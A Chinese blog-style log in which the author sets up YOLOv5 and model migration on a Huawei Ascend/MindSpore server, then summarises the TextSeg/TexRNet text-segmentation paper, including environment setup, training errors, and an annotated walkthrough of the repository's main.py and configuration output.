    1. 在服务器中新建一个文件夹,用于存放项目文件,只有放在work文件夹里,下次再打开服务器时内容才不会丢失:

    /home/ma-user/work 目录下的数据会保存,其余目录下内容会被清理。如果需要保存开发环境,可以通过保存镜像的方式保留开发环境设置。

    png

    1. 服务器中新建一个新的虚拟环境:yolov5
    1
    2
    3
    conda create -n yolov5 python=3.7
    source activate yolov5
    which python

    linux 环境下的 which python 可以返回当前虚拟环境下的解释器位置:~/.conda/envs/yolov5/bin/python

    1. 设置解释器:Pycharm 下 File-Settings-Project: yolov5-5.0-Add Interpreter,选择 Existing 和对应的 SSH Server 地址:

    png

    1. 设置好解释器和对应的服务器目录:

    png

    1. 此时服务器里就会同步 yolov5 这个项目了,等待同步完成

    png

    1. requirements.txt 里,删除 torch>=1.7.0torchvision>=0.8.1 这两行

    png

    1. 在服务器中安装环境,这个服务器自带 1.8.1 版本的 pytorch,对应的是 0.9.1 的 torchvision,必须设定好版本,不然会寄:
    1
    2
    3
    cd /home/ma-user/work/yolov5-5.0/
    pip install -r requirements.txt
    pip install torchvision==0.9.1
    1. 在自己的 Notebook 中选择 更多-保存镜像,以在下次启动服务器时,配置的环境不丢失。

    png

    开跑(寄)

    1. 开跑 detect.py!喜提错误:ImportError: libGL.so.1: cannot open shared object file: No such file or directory,使用命令pip install opencv-python-headless填之。

    2. 开跑 detect.py!喜提错误:cv2.error: OpenCV(4.7.0) /io/opencv/modules/highgui/src/window.cpp:1272: error: (-2:Unspecified error) The function is not implemented. Rebuild the library with Windows, GTK+ 2.x or Cocoa support. If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config, then re-run cmake or configure script in function ‘cvShowImage’,问 ChatGPT,说这个报错可能是由于 OpenCV 没有启用 GUI 支持导致的,于是我把 --view-img 关了,能跑了,但是没有识别结果,giao!

    png

    算法迁移文档

    迁移适配流程

    png

    昇腾平台是否已适配需求算法

    最新 modelzoo 地址以链接实时更新为准:ModelZoo 查询及提问链接 (yuque.com)

    一、模型适配于昇腾平台

    1. 模型适配于 mindspore

    gitee 提问链接:Issues · MindSpore/mindspore - Gitee.com

    1. MindSporeModelZoo 模型库 (模型适配于 mindspore)
    2. 模型适配于 NPU

    gitee 提问链接:Issues · Ascend/modelzoo - Gitee.com

    1. AscendModelZoo 模型库—gitee

    2. AscendModelZoo 模型库—官网展示

    3. Modelzoo-Pytorch 模型库

    4. Modelzoo-Tensorflow 模型库

    5. Modelzoo-yolo 系列 模型库

    二、模型未适配于昇腾平台

    1. 第三方框架迁移至 mindspore

    2. pytorch 框架算法迁移至 npu

    3. tensorflow 框架算法迁移至 npu

    数据传输

    《notebook 服务器数据准备》:主要用于将测试脚本、数据集、第三方依赖包等传输到 notebook 服务器

    • 使用 linux 命令直接下载
      • 通过 wget,git 等命令直接下载
    • 在本地已准备好的数据传输到 notebook 服务器
      • 传辅较小的脚本数据或数据集时可直接通过 mobaxterm 直接上传
      • 传输较大的文件(百 G 量级)时可通过 obs 传输(先从本地传输到 obs,再从 obs 传输到 notebook 服务器)

    迁移工具

    -《迁移工具-pytorch/tensorflow 框架算法迁移至 mindspore 框架》:迁移工具-x2mindspore (yuque.com)
    -《迁移工具-pytorch 框架算法迁移至 Ascend》:迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)
    -《迁移工具-tensorflow 框架算法迁移至 Ascend》:迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)

    1. 创建 notebook 服务器并登录
    2. 命令行使用迁移工具分析脚本
    3. 输出
      • 迁移后脚本
      • 支持算子列表 supported_api.csv
      • 不支持算子列表 unsupported_api.csv
    4. 按照不支持算子列表 unsupported_api.csv 建议进行修改

    参考资料汇总

    算法迁移实践(寄)

    1. 进入迁移工具所在目录并执行迁移命令
    1
    cd /usr/local/Ascend/ascend-toolkit/latest/tools/x2mindspore
    1. 设置好待迁移的工程 /home/ma-user/work/yolov5-5.0/ 和迁移后的目录位置 /home/ma-user/work/yolov5-5.0-mindspore

    png

    1. 开跑!
    1
    ./run_x2mindspore.sh -i /home/ma-user/work/yolov5-5.0/ -o /home/ma-user/work/yolov5-5.0-mindspore -f pytorch

    喜提错误:ModuleNotFoundError: No module named ‘libcst’,堵它:pip install libcst

    1. 继续开跑!

    png

    等等等……等到 X2MindSpore run success, welcome to the next use. 就可以 next use。

    1. 把迁移好的项目下载到本地:

    png

    1. 设置完解释器,然后修修补补……

    要按照不支持算子列表 unsupported_api.csv 建议进行修改……emmmmm……要不以后还是用现成的吧。

    跑现成的框架(寄)

    教程:Yolov5-PyTorch (hiascend.com)

    就继续是你了,YOLOv5-6.0(说只有 6.0 以上版本才支持 NPU……)!

    1. built-in/PyTorch/Official/cv/object_detection/Yolov5_for_PyTorch_v6.0 · Ascend/modelzoo-GPL - 码云 - 开源中国 (gitee.com) 下载项目文件 Yolov5_for_PyTorch_v6.0

    png

    1. 设置解释器

    png

    1. 开跑 detect.py!然后喜提错误:AttributeError: module ‘torch.npu’ has no attribute ‘is_available’,在utils/torch_utils中将import torch改成import torch_npu as torch

    啊啊啊啊啊后面什么乱七八糟的啊啊啊啊啊

    跑一个 Mindspore 支持的框架

    models: Models of MindSpore (gitee.com) 里面找一个喜欢的,就决定是你了,EAST!models: Models of MindSpore - Gitee.com

    居然没寄!见 下一篇 博客!

    ]]>
    @@ -6937,7 +6937,7 @@ /posts/Paper-Rethinking%20Text%20Segmentation%EF%BC%9AA%20Novel%20Dataset%20and%20A%20Text-Specific%20Refinement%20Approach/ - 资源

    笔记

    文本分割(text segmentation)是很多任务的先决条件!如文本样式迁移(text style transfer)场景文本移除(scene text removal)

    TextSeg

    最近一次公共文本分割挑战在 2013-2015 年,由 ICDAR 主办。只有数据集:

    • Total Text
    • COCO TS
    • MLT_S

    都只有场景文本,没有艺术设计文本。

    目前数据集太少了啊啊啊啊!但是我们提出了一种新的数据集 TextSeg

    • 4024 张图像

      • 2646 训练集
      • 340 验证集
      • 1038 测试集
    • 具有六种类型的注释:

      • 单词 word

      • 字符 character

      • 边界多边形 bounding polygons

      • 蒙版 masks

      • 转录 transcriptions

      • 阴影、3D、光晕等也进行了注释

    • 先进之处:

      • 来自不同来源,样式更多
      • 注释更全面
      • accurate masks 更准确

    TexRNet

    早期都是用阈值法进行分割,对复杂颜色和纹理的场景文本图像就 GG。深度学习方法:SMANet。

    提出了一种新的文本分割网络:TexRNet

    png

    • 适应了文本的独特特性,如非凸边界、不同纹理等。
    • DeeplabV3+ 或 HRNet
      • ResNet101-DeeplabV3+ 和 HRNetV-W48 是语义分割领域的里程碑和最先进的作品
    • 有效的网络模块:关键特征池(key features pooling)基于注意力的相似性检查(attention-based similarity checking)
      • 关键特征池:使用余弦相似性学习文本纹理
      • 基于注意力的相似性检查,使用一个注意力层,用 $v$ 作为关键字,$x_f$ 作为查询,并通过点积和 softmax 来计算查询关键字的相似性 $x_{att}$:$x_{att}=\mathrm{Softmax}(v^T\cdot x_f),x_{att}\in \mathbb{R}^{c\times n}$
    • 引入了**三映射(trimap loss)鉴别器(glyph discriminator)**损失
      • 关注边界的损失函数将进一步提高文本的精度

        • $\mathcal L_{tri}=\mathrm{WCE}(x_{rfn},x_{gt},w_{tri})\\mathrm{WCE}(x,y,m)=-\frac{\summ_{j=1}w_j\sumc_{j=1}x_{i,j}\log(y_{i,j})}{\sum^n_{j=1}w_j}$
          • $w_{tri}$ 是文本边界上值为 1、其他地方为 0 的二进制映射
          • $\mathrm{WCE}(x,y,w)$ 是由空间映射 $w$ 加权的 $x$ 和 $y$ 之间的交叉熵
      • 预训练用于字符识别的分类器,有 37 个类,包含 26 个字母,10 个数字和 misc

      • 最终损失函数:$\mathcal L = \mathcal L_{sem} +\alpha\mathcal L_{rfn} +\beta\mathcal L_{tri} +\gamma\mathcal L_{dis}$


    实验结果:

    MethodTextSeg(Ours)ICDAR13 FSTCOCO_TSMLT_STotal-Text
    指标fgIoU/F-scorefgIoU/F-scorefgIoU/F-scorefgIoU/F-scorefgIoU/F-score
    DeeplabV3+84.07/0.91469.27/0.80272.07/0.64184.63/0.83774.44/0.824
    HRNetV2-W4885.03/0.91470.98/0.82268.93/0.62983.26/0.83675.29/0.825
    HRNetV2-W48 + OCR85.98/0.91872.45/0.83069.54/0.62783.49/0.83876.23/0.832
    Ours: TexRNet + DeeplabV3+86.06/0.92172.16/0.83573.98/0.72286.31/0.83076.53/0.844
    Ours: TexRNet + HRNetV2-W4886.84/0.92473.38/0.85072.39/0.72086.09/0.86578.47/0.848

    代码

    TextSeg

    我们的数据集(TextSeg)仅供学术界使用,不能用于任何商业项目和研究。要下载数据,请向 textseg.dataset@gmail.com 发送请求电子邮件,并告诉我们您隶属于哪所学校。

    但是网上居然还是能找到下载地址……:TextSeg 大规模文本检测及分割数据集 - 数据集下载 - 超神经 (hyper.ai)


    png

    • image.tar.gz包含 4024 张图像。

    • annotation.tar.gz

      与图像对应的标签。包括以下三种类型的文件:

      • [dataID]_anno.json 包含所有单词和字符级别的翻译以及边界多边形。
      • [dataID]_mask.png 包含所有字符掩码。字符掩码标签值将从 1 到 n 排序。标签值 0 表示背景,255 表示忽略。
      • [dataID]_maskeff.png 包含所有具有效果的字符掩码。
      • Adobe_Research_License_TextSeg.txt 许可证文件。
    • semantic_label.tar.gz

      包含所有字级(语义级)掩码。它包含:

      • [dataID]_maskfg.png 0 表示背景,100 表示单词,200 表示单词效果,255 表示忽略。(也可以使用[dataID]_maskfg.png[dataID]_mask.png[dataID]_maskeff.png)
    • split.json 训练集,验证集和测试集的官方拆分。

    • [可选]我们论文中使用的旧版本标签。可以下载它以复制我们的论文结果。semantic_label_v1.tar.gz

    TexRNet

    有两种 Backbone,效果各有千秋?

    • HENetV-W48
    • DeeplabV3+

    TexRNet - Google Drive 下载相应内容:

    • 测试:texrnet_hrnet.pthtexrnet_deeplab.pth

    • 训练:init/*

    配置

    1. 新建一个 conda 环境:
    conda create -n texrnet python=3.7
    conda activate texrnet
    1. 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了 orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision
    • torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl
    • torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl

    不知道为什么今天 edge 下载得特别慢,用迅雷了。

    png

    pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    png

    1. 拉取仓库:SHI-Labs/Rethinking-Text-Segmentation: [CVPR 2021] Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach (github.com)

    2. 在仓库目录下,将 requirement.txt 里的 torch==1.6torchvision==0.7 删掉,然后执行:

    pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
    1. 在仓库目录下,新建好下列文件夹:
    • pretrained
      • pretrained/init
    • data
    • log

    png

    1. 放置数据库在 data/TextSeg 中:

    png

    测试

    1. 先改代码!Windows 下踩坑:Pytorch 报错解决——(亲测有效)RuntimeError: Distributed package doesn‘t have NCCL built in_康康好老啊的博客-CSDN 博客。pycharm 中 ctrl+shift+r 将所有 nccl 替换为 gloo

    2. 设置参数:--eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    png

    1. 能跑,GPU 风扇疯狂转,吓得我赶紧停了😅。还是用服务器吧呜呜呜……

    png

    训练

    1. 设置参数:--hrnet --gpu 0 --dsname textseg --trainwithcls

    png

    1. 踩坑,在 data\TextSeg 中,把 annotation 文件夹名称修改为 bpoly_label

    png

    1. 应该能 train 吧,显示显存不够是真的牛逼😅。还是用服务器吧呜呜呜……(是不是调成 gloo 的问题?该好好学 linux 了呜呜呜)

    png

    我说婷婷!在 train_utils.py 里把 cfg.DATA.NUM_WORKERS_PER_GPU 调小就又可以跑了!

    if not cfg.DEBUG:
    cfg.DATA.NUM_WORKERS_PER_GPU = 2
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
    cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
    'hrnet':1, 'texrnet': 10}
    return cfg

    好吧还是跑不了,giao! File “D:\Study\XXXXX\Rethinking-Text-Segmentation\lib\torchutils.py”, line 262, in _call_
    return y
    UnboundLocalError: local variable ‘y’ referenced before assignment

    阅读

    感觉这个仓库的代码写的很隐秘……一层又一层的。

    main.py

    --eval --pth pretrained/texrnet_hrnet.pth --hrnet --gpu 0 --dsname textseg

    表示:

    • 开启 eval 模式
    • 预训练模型路径:pretrained/texrnet_hrnet.pth
    • 使用 HRNet 模型
    • 使用 0 号 GPU
    • 数据集:textseg

    设置 parser 参数:

    nametypedefaulthelp
    –debugboolFalse是否启动 debug 模式
    –hrnetboolFalse是否使用 HRNet 模型
    –evalboolFalse是否开启 eval 模式
    –pthstr保存的权重文件路径,即预训练模型的路径
    –gpu使用哪些 GPU
    –portint11233分布式处理的端口号
    –dsnamestr‘textseg’数据集名称,可选:‘textseg’、‘cocots’、‘mlt’、‘icdar13’、‘totaltext’
    –trainwithclsboolFalse是否使用分类器来训练

    istrain = not args.eval,如果不开启 eval 模式,那就是开启 train 模式。

    # 设置训练模式
    if istrain:
    cfg = copy.deepcopy(cfg_train)
    else:
    cfg = copy.deepcopy(cfg_test)

    if istrain:
    # 运行在训练模式下,则调用 get_experiment_id()函数获取一个新的实验 ID,并将其赋值给 cfg.EXPERIMENT_ID。
    # 每次运行程序时,都会产生一个新的实验 ID,以便在训练多个模型时能够区分它们之间的差异
    cfg.EXPERIMENT_ID = get_experiment_id()
    else:
    # 表示当前不处于任何实验中
    cfg.EXPERIMENT_ID = None

    # 设置数据集
    if args.dsname == "textseg":
    cfg_data = cfg_textseg
    elif args.dsname == "cocots":
    cfg_data = cfg_cocots
    elif args.dsname == "mlt":
    cfg_data = cfg_mlt
    elif args.dsname == "icdar13":
    cfg_data = cfg_icdar13
    elif args.dsname == "totaltext":
    cfg_data = cfg_totaltext
    else:
    raise ValueError

    cfg.DEBUG = args.debug
    cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
    if args.gpu is None:
    # 如果不设置 GPU,就都用了
    cfg.GPU_DEVICE = 'all'
    else:
    # 使用指定的 GPU
    cfg.GPU_DEVICE = args.gpu

    # 加载模型和数据
    cfg.MODEL = copy.deepcopy(cfg_mdel)
    cfg.DATA = copy.deepcopy(cfg_data)

    if istrain:
    cfg = set_cfg_train(cfg, dsname=args.dsname)
    if args.hrnet:
    # 调用 set_cfg_hrnetw48_train 函数对 HRNet-W48 模型进行配置
    cfg = set_cfg_hrnetw48_train(cfg)
    else:
    cfg = set_cfg_eval(cfg, dsname=args.dsname)
    if args.hrnet:
    cfg = set_cfg_hrnetw48_eval(cfg)
    # 加载预训练模型
    cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

    # 设置数据集模式
    if istrain:
    if args.dsname == "textseg":
    cfg.DATA.DATASET_MODE = 'train+val'
    elif args.dsname == "cocots":
    cfg.DATA.DATASET_MODE = 'train'
    elif args.dsname == "mlt":
    cfg.DATA.DATASET_MODE = 'trainseg'
    elif args.dsname == "icdar13":
    cfg.DATA.DATASET_MODE = 'train_fst'
    elif args.dsname == "totaltext":
    cfg.DATA.DATASET_MODE = 'train'
    else:
    raise ValueError
    else:
    if args.dsname == "textseg":
    cfg.DATA.DATASET_MODE = 'test'
    elif args.dsname == "cocots":
    cfg.DATA.DATASET_MODE = 'val'
    elif args.dsname == "mlt":
    cfg.DATA.DATASET_MODE = 'valseg'
    elif args.dsname == "icdar13":
    cfg.DATA.DATASET_MODE = 'test_fst'
    elif args.dsname == "totaltext":
    cfg.DATA.DATASET_MODE = 'test'
    else:
    raise ValueError

    if istrain:
    if args.trainwithcls: # 启动分布式训练
    if args.dsname == 'textseg': # 数据集
    cfg.DATA.LOADER_PIPELINE = [
    'NumpyImageLoader', # 使用 numpy 模块读取图像数据
    'TextSeg_SeglabelLoader', # 加载文本区域分割标签数据
    'CharBboxSpLoader',] # 加载字符边界框数据。这些数据都是用于文本检测或分割任务的
    cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32] # 随机裁剪的尺寸
    cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2] # 缩放比例
    cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3] # 宽高比范围
    cfg.DATA.TRANS_PIPELINE = [
    'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
    'TextSeg_RandomResizeCropCharBbox', # 对文本区域分割标签和字符边界框等数据进行随机尺度变换和裁剪操作,以增强模型鲁棒性
    'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
    'Normalize', # 进行零均值和单位方差的标准化处理
    'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
    'RandomCrop', # 对图像数据进行随机裁剪操作
    ]
    elif args.dsname == 'icdar13':
    cfg.DATA.LOADER_PIPELINE = [
    'NumpyImageLoader', # 使用 numpy 模块读取图像数据
    'SeglabelLoader', # 加载文本区域分割标签数据
    'CharBboxSpLoader',] # 加载字符边界框数据
    cfg.DATA.TRANS_PIPELINE = [
    'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
    'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
    'Normalize', # 进行零均值和单位方差的标准化处理
    'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
    'RandomCrop', # 对图像数据进行随机裁剪操作
    ]
    else:
    raise ValueError
    # 将文本数据格式化为文本区域和字符边界框标签,以便进行检测和识别任务的训练
    cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
    # 用于将字符边界框转化成方形,以方便进行 RoI 池化
    cfg.DATA.LOADER_SQUARE_BBOX = True
    # 表示随机裁剪操作从哪个阶段开始,这里设为'sem'即从语义分割的阶段开始
    cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
    # 表示网络在训练过程中从哪个阶段进行预测得到输出结果,这里设为'sem'也是从语义分割的阶段开始
    cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
    # the one with 93.98% and trained on semantic crops
    # 分类器的预训练模型路径
    cfg.TRAIN.CLASSIFIER_PATH = osp.join(
    'pretrained', 'init', 'resnet50_textcls.pth',
    )
    # RoI 池化时边界框的扩充方式,这里采用 semcrop
    cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
    # RoI 池化后的图像大小
    cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
    # 是否对分类器进行更新
    cfg.TRAIN.UPDATE_CLASSIFIER = False
    # 在训练过程中从语义分割的阶段开始多少次迭代后激活分类器的训练
    cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
    # 各个损失函数的权重,包括语义分割的损失、RFN 的损失、RFNtri 的损失和分类器的损失
    cfg.TRAIN.LOSS_WEIGHT = {
    'losssem' : 1,
    'lossrfn' : 0.5,
    'lossrfntri': 0.5,
    'losscls' : 0.1,
    }

    if istrain:
    # 是否采用 HRNet 作为语义分割网络模型,如果不采用,就用 deeplab
    if args.hrnet:
    cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
    else:
    cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
    # 'LOG_DIR':日志文件所在目录,如果是训练模式则创建一个新的实验文件夹,并将日志文件保存在该目录下的'train.log'中
    cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
    else:
    # 如果是评估模式则将日志文件保存在'eval.log'中
    cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
    cfg.TEST.SUB_DIR = None

    if cfg.DEBUG:
    # 如果开启了调试模式,则将实验 ID 设置为 999999999999,方便跟踪调试结果
    cfg.EXPERIMENT_ID = 999999999999
    # 每个 GPU 使用的数据加载器线程数
    cfg.DATA.NUM_WORKERS_PER_GPU = 0
    # 每个 GPU 使用的 batch size 大小
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

    cfg = common_initiates(cfg) # 该函数用于加载训练和测试数据,并进行数据预处理、标准化等操作

    if istrain:
    if args.trainwithcls:
    # 执行训练操作的时间戳。如果使用分类器,则调用 ts_with_classifier()函数进行时间戳设置
    exec_ts = ts_with_classifier()
    else:
    # 调用 ts()函数进行时间戳设置
    exec_ts = ts()
    # 训练器对象
    trainer = train(cfg)
    # 向训练器对象注册不同的训练阶段,包括数据加载、前向传播、反向传播、参数更新等流程
    trainer.register_stage(exec_ts)

    # trainer(0)
    # 使用多进程方式进行训练,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速训练过程。
    # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
    mp.spawn(trainer,
    args=(),
    nprocs=cfg.GPU_COUNT,
    join=True)
    else:
    # 执行测试操作的时间戳
    exec_es = es()
    # 测试器对象
    tester = eval(cfg)
    # 向测试器对象注册不同的测试阶段,包括数据加载、前向传播、评估等流程
    tester.register_stage(exec_es)

    # tester(0)
    # 使用多进程方式进行测试,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速测试过程。
    # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
    mp.spawn(tester,
    args=(),
    nprocs=cfg.GPU_COUNT,
    join=True)

    开跑时,会显示各种参数的情况:

    {'COMPUTER_NAME': 'OMEN',  // 电脑名称
    'CUDA': True, // CUDA 是否可用
    'DATA': {'ALIGN_CORNERS': True, // 是否对齐图像的四个角
    'CLASS_NAME': ['background', 'text'], // 类别名称。在本例中,有两类分别为'background'和'text'
    'CLASS_NUM': 2, // 类别数量
    'DATASET_MODE': 'train+val', // 数据集模式。在本例中,是训练数据集和验证数据集结合在一起使用
    'DATASET_NAME': 'textseg', // 数据集名称,在本例中为'textseg'
    'EFFECTIVE_CLASS_NUM': 2, // 有效的类别数量
    'FORMATTER': 'SemChinsChbbxFormatter', // 数据格式化器的名称,在本例中为'SemChinsChbbxFormatter'
    'IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
    'IM_MEAN': [0.485, 0.456, 0.406], // 图像各个通道的均值
    'IM_STD': [0.229, 0.224, 0.225], // 图像各个通道的标准差
    'LOADER_DERIVED_CLS_MAP_TO': 'bg', // 加载程序映射的类名
    'LOADER_PIPELINE': ['NumpyImageLoader', // 加载数据的处理流程
    'TextSeg_SeglabelLoader',
    'CharBboxSpLoader'],
    'LOADER_SQUARE_BBOX': True, // 是否在加载时将字符的 bbox 转换为正方形
    'LOAD_BACKEND_IMAGE': 'pil', // 读取图像的库名称
    'LOAD_IS_MC_IMAGE': False, // 是否是多通道图像
    'LOAD_IS_MC_SEGLABEL': True, // 加载的标签是否是多通道的
    'NUM_WORKERS': 5, // 加载数据的线程数
    'NUM_WORKERS_PER_GPU': 5, // 每个 GPU 上加载数据的线程数
    'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // 对图像进行随机 crop 时需要填充的内容
    'RANDOM_CROP_PADDING_MODE': 'random', // 填充模式,在本例中为'random'
    'RANDOM_CROP_SIZE': [513, 513], // 进行随机 crop 时输出的尺寸大小
    'RANDOM_RESIZE_CROP_FROM': 'sem', // 将 semantic label resize 到指定大小后再进行随机 crop
    'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // 进行 resize 时的纵横比范围
    'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // 进行 resize 时的缩放比例范围
    'RANDOM_RESIZE_CROP_SIZE': [32, 32], // 在进行 resize 前需要保证 semantic label 的最小尺寸大小
    'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // 是否对齐图像的四个角
    'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // 进行缩放的维度,在本例中为长边
    'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // 进行缩放时的尺寸范围
    'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // 数据集所在目录
    'SEGLABEL_IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
    'SEMANTIC_PICK_CLASS': 'all', // 要选择的语义类别,在本例中为'all'
    'TRANS_PIPELINE': ['UniformNumpyType', // 图像的预处理流程
    'TextSeg_RandomResizeCropCharBbox',
    'NormalizeUint8ToZeroOne',
    'Normalize',
    'RandomScaleOneSide',
    'RandomCrop'],
    'TRY_SAMPLE': None}, // 尝试样本的数量
    'DEBUG': False, // 是否开启调试模式
    'DIST_BACKEND': 'gloo', // 分布式训练的后端,本例中为'gloo'
    'DIST_URL': 'tcp://127.0.0.1:11233', // 分布式训练的 URL
    'EXPERIMENT_ID': 168471973979, // 实验的 ID
    'GPU_COUNT': 1, // 使用的 GPU 数量
    'GPU_DEVICE': [0], // 使用的 GPU 编号
    'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // 日志存储的目录路径
    'LOG_FILE': 'D:\\Study\\XXXX\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // 日志输出的文件路径
    'MAINLOOP_EXECUTE': True, // 是否执行主循环
    'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // 主要的代码文件
    'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // 代码所在的路径
    'MATPLOTLIB_MODE': 'Agg', // Matplotlib 模式
    'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // 杂项文件的存储目录路径
    // 模型的配置文件,包含了 HRNet 模型的距离参数和结构
    'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
    'BN_MOMENTUM': 'hardcoded to 0.1', // Batch Normalization 层的动量
    'FINAL_CONV_KERNEL': 1, // 最终卷积核的大小
    'IGNORE_LABEL': 999, // 忽略标签的数值
    'INTRAIN_GETPRED': False, // 是否在训练时计算预测结果
    'LOSS_TYPE': 'ce', // 使用的损失函数类型
    'MODEL_TAGS': ['v0', 'base'], // 模型标签
    'OUTPUT_CHANNEL_NUM': 720, // 模型输出通道数
    'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // 预训练模型的路径
    'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // HRNet 中所使用的块的类型
    'FUSE_METHOD': 'SUM', // HRNet 的每个分支上进行特征融合的方法
    'NUM_BLOCKS': [4], // 每个分支中块的数量
    'NUM_BRANCHES': 1, // 使用的分支数
    'NUM_CHANNELS': [64], // 每个分支的通道数
    'NUM_MODULES': 1}, // 使用的模块数
    'STAGE2_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4],
    'NUM_BRANCHES': 2,
    'NUM_CHANNELS': [48, 96],
    'NUM_MODULES': 1},
    'STAGE3_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4],
    'NUM_BRANCHES': 3,
    'NUM_CHANNELS': [48, 96, 192],
    'NUM_MODULES': 4},
    'STAGE4_PARA': {'BLOCK': 'BASIC',
    'FUSE_METHOD': 'SUM',
    'NUM_BLOCKS': [4, 4, 4, 4],
    'NUM_BRANCHES': 4,
    'NUM_CHANNELS': [48, 96, 192, 384],
    'NUM_MODULES': 3}},
    'MODEL_NAME': 'texrnet', // 模型名称
    'TEXRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
    'BIAS_ATTENTION_TYPE': 'cossim', // 偏置注意力的类型
    'BN_TYPE': 'bn', // Batch Normalization 层的类型
    'CONV_TYPE': 'conv', // 卷积层的类型
    'INIT_BIAS_ATTENTION_WITH': None, // 哪个注意力层进行初始化偏置注意力
    'INPUT_CHANNEL_NUM': 720, // 输入 Tensor 的通道数
    'INTRAIN_GETPRED_FROM': 'sem', // 在训练时计算预测结果的来源。此处为'sem',表示来自语义分割
    'MODEL_TAGS': ['hrnet'], // 模型标签
    'PRETRAINED_PTH': None, // 预训练模型的路径
    'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // 精细化模块中各层输出通道数
    'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // 精细化模块中各损失函数类型
    'lossrfntri': 'trimapce'},
    'RELU_TYPE': 'relu', // ReLU 激活函数的类型
    'SEMANTIC_CLASS_NUM': 2, // 语义分割的类别数
    'SEMANTIC_IGNORE_LABEL': 999, // 语义分割中被忽略的标签
    'SEMANTIC_LOSS_TYPE': 'ce'}}, // 语义分割中使用的损失函数类型
    'RND_RECORDING': False, // 是否记录随机数生成器的状态
    'RND_SEED': 2, // 随机数种子
    'SAVE_CODE': True, // 是否保存代码
    'TORCH_VERSION': '1.13.1+cu117', // 使用的 PyTorch 版本号
    'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // 在第几次迭代后为分割模型激活分类器
    'ACTIVATE_REFINEMENT_AT_ITER': 0, // 在第几次迭代后激活精细化模块
    'BATCH_SIZE': 5, // 每个 GPU 上的 batch 大小
    'BATCH_SIZE_PER_GPU': 5,
    'CKPT_EVERY': inf, // 每多少 epoch 保存一次模型权重
